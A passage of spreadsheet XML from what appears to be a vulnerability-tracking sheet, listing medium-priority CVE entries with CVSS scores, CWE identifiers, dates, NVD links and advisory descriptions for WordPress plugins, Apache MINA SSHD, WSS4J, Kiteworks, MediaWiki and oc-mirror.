      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>The Simply Schedule Appointments plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.12.32 via the 'recursive' parameter. This makes it possible for unauthenticated attackers to extract customer PII — including names, email addresses, phone numbers, and custom form field data — stored in appointment records, as well as per-appointment public_token values. The leaked per-appointment public_token values also enable unauthenticated attackers to delete arbitrary appointments via the DELETE /wp-json/ssa/v1/appointments/{id} endpoint, which accepts the token as sole authorization.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92245</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94002</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>Possible memory exhaustion in SFTP clients (DefaultSftpClient) in component sshd-sftp in Apache MINA SSHD versions 0.9.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5.
Apache 
MINA SSHD is a Java library for client-side and server-side SSH. The sshd-sftp component provides support for SFTP.
The SFTP client implementation, when receiving a reply, did not check that this reply corresponded to a request sent earlier. Unsolicited replies would be stored but never consumed. A malicious server could keep sending unsolicited replies until available memory in the client was exhausted.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94002</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94120</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in GravityExport Lite for Gravity Forms &lt;= 2.7.2 versions.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94120</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94123</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Arbitrary File Download in NextGEN Gallery &lt;= 4.5.0 versions.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94123</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94178</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in Import and export users and customers &lt;= 2.5.2 versions.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94178</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95587</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Hostinger Migrator &lt;= 1.0 versions.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95587</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95616</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in WSS4J's DER bounds check lets an oversized allocation pass validation. An unauthenticated attacker can send a SOAP message carrying an X.509 certificate whose SubjectKeyIdentifier extension declares a length of 0x7FFFFFFF; WSS4J decodes this while resolving the signature's key reference, before the message is authenticated, so an eleven-byte extension triggers a 2 GB allocation. Repeated requests exhaust server memory.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95616</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96348</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Bookly &lt;= 28.2 versions.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96348</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96818</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in WP Express Checkout (Accept PayPal Payments) &lt;= 2.4.9 versions.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96818</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96823</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Arbitrary Content Deletion in Customer Reviews for WooCommerce &lt;= 5.120.0 versions.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96823</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97197</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in WordPress Backup &amp; Migration &lt;= 1.6.0 versions.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97197</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97240</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in StifLi Backup Tools &lt;= 2.2.7 versions.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97240</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97241</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in BackupEase &lt;= 2.2.2 versions.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97241</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97244</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>Contributor Path Traversal in Creator LMS &lt;= 1.2.19 versions.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97244</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102123</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>A Kiteworks appliance setup interface did not confine a user-supplied file path to its intended directory, which could allow an unauthenticated attacker to write a file to any location writable by the affected service account, potentially compromising the integrity of the appliance or rendering it unavailable until an operator intervenes. Exploitation requires network access to the affected interface, which is not reachable on a fully configured appliance in its default configuration; reaching it depends on either the transient window while an appliance is first being provisioned or a non-default appliance configuration.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102123</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103446</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through User-Controlled key vulnerability in The Wikimedia Foundation MediaWiki WikiLambda extension allows Authentication Bypass.
This issue affects MediaWiki WikiLambda extension: 1.46.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103446</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101295</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>Path traversal / arbitrary file write in oc-mirror's operator catalog image extraction. When mirroring operator catalogs using either the legacy v1 path (--v1) or the OCI feature path (--use-oci-feature), oc-mirror extracts tar entries from catalog image layers without validating that file paths resolve within the intended destination directory.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101295</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103229</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
